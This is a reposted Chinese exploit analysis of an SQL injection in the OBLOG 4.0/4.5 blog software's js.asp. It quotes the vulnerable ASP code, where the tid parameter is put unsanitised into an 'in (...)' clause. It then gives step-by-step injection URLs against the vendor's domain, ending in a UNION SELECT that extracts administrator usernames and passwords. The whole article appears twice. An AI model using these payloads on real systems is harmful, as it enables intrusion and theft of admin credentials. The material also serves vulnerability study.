OBLOG4.0 OBLOG4.5漏洞利用分析
程序员文章站
2022-06-23 22:10:19
来源:deepen study 漏洞文件:js.asp <% dim oblog set oblog=new class_sy...
来源:deepen study
漏洞文件:js.asp
<%
dim oblog
set oblog=new class_sys
oblog.autoupdate=false
oblog.start
dim js_blogurl,n
js_blogurl=trim(oblog.cacheconfig(3))
n=cint(request(”n”))
if n=0 then n=1
select case cint(request(”j”))
case 1
call tongji()
case 2
call topuser()
case 3
call adduser()
case 4
call listclass()
case 5
call showusertype()
case 6
call listbestblog()
case 7
call showlogin()
case 8
call showplace()
case 9
call showphoto()
case 10
call showblogstars()
case 11
call show_hotblog()
case 12
call show_teams()
case 13
call show_posts()
case 14
call show_hottag()
case 0
call showlog()
end select
****************省略部分代码******************
sub show_posts()
dim teamid,postnum,l,u,t
teamid=request(”tid”)
postnum=n
l=cint(request(”l”))
u=cint(request(”u”))
t=cint(request(”t”))
dim rs,sql,sret,saddon
sql=”select top ” & postnum & ” teamid,postid,topic,addtime,author,userid from oblog_teampost where idepth=0 and isdel=0 ”
if teamid<>“” and teamid<>“0″ then
teamid=replace(teamid,”|”,”,”)
sql=sql & ” and teamid in (” & teamid & “) ”
end if
sql=sql & ” order by postid desc”
set rs=oblog.execute(sql)
sret=”
”
do while not rs.eof
saddon=”"
* sret=sret & “ ” & oblog.filt_html(left(rs(2),l)) & “”
if u=1 then saddon=rs(4)
if t=1 then
if saddon<>“” then saddon=saddon & “,”
saddon=saddon & rs(3)
end if
if saddon<>“” then saddon=”(” & saddon & “)”
sret=sret & saddon & “
”
rs.movenext
loop
set rs = nothing
sret=sret & “
”
response.write oblog.htm2js (sret,true)
end sub
调用show_posts()过程必须要符合上面的参数n=1,j=13
(” & teamid & “)
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=1 返回正常
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=2 返回异常
猜管理员表名
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 查询语句 and (1=1
sql=”select top ” & postnum & ” teamid,postid,topic,addtime,author,userid from oblog_teampost where idepth=0 and isdel=0 ”
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1
document.write('
*
‘);
gid=1跟pid=2里的1,2就是了 直接替换里面的1,2为username,password
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1
漏洞文件:js.asp
<%
dim oblog
set oblog=new class_sys
oblog.autoupdate=false
oblog.start
dim js_blogurl,n
js_blogurl=trim(oblog.cacheconfig(3))
n=cint(request(”n”))
if n=0 then n=1
select case cint(request(”j”))
case 1
call tongji()
case 2
call topuser()
case 3
call adduser()
case 4
call listclass()
case 5
call showusertype()
case 6
call listbestblog()
case 7
call showlogin()
case 8
call showplace()
case 9
call showphoto()
case 10
call showblogstars()
case 11
call show_hotblog()
case 12
call show_teams()
case 13
call show_posts()
case 14
call show_hottag()
case 0
call showlog()
end select
****************省略部分代码******************
sub show_posts()
dim teamid,postnum,l,u,t
teamid=request(”tid”)
postnum=n
l=cint(request(”l”))
u=cint(request(”u”))
t=cint(request(”t”))
dim rs,sql,sret,saddon
sql=”select top ” & postnum & ” teamid,postid,topic,addtime,author,userid from oblog_teampost where idepth=0 and isdel=0 ”
if teamid<>“” and teamid<>“0″ then
teamid=replace(teamid,”|”,”,”)
sql=sql & ” and teamid in (” & teamid & “) ”
end if
sql=sql & ” order by postid desc”
set rs=oblog.execute(sql)
sret=”
”
do while not rs.eof
saddon=”"
* sret=sret & “ ” & oblog.filt_html(left(rs(2),l)) & “”
if u=1 then saddon=rs(4)
if t=1 then
if saddon<>“” then saddon=saddon & “,”
saddon=saddon & rs(3)
end if
if saddon<>“” then saddon=”(” & saddon & “)”
sret=sret & saddon & “
”
rs.movenext
loop
set rs = nothing
sret=sret & “
”
response.write oblog.htm2js (sret,true)
end sub
调用show_posts()过程必须要符合上面的参数n=1,j=13
(” & teamid & “)
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=1 返回正常
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=2 返回异常
猜管理员表名
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 查询语句 and (1=1
sql=”select top ” & postnum & ” teamid,postid,topic,addtime,author,userid from oblog_teampost where idepth=0 and isdel=0 ”
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1
document.write('
*
‘);
gid=1跟pid=2里的1,2就是了 直接替换里面的1,2为username,password
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1
推荐阅读
-
网站漏洞检测之用户密码找回网站漏洞的安全分析与利用
-
PHP利用hash冲突漏洞进行DDoS攻击的方法分析
-
PhpMyAdmin4.8.1文件包含漏洞分析及复现利用(CVE-2018-12613)
-
CVE-2016-10191 FFmpeg RTMP Heap Buffer Overflow 漏洞分析及利用
-
CVE-2016-10190 FFmpeg Http协议 heap buffer overflow漏洞分析及利用
-
Mysql身份认证漏洞的分析以及利用
-
PHP本地文件包含漏洞环境搭建与利用分析
-
phpcms2008 注入漏洞 利用分析
-
OBLOG4.0 OBLOG4.5漏洞利用分析
-
OBLOG4.0 OBLOG4.5漏洞利用分析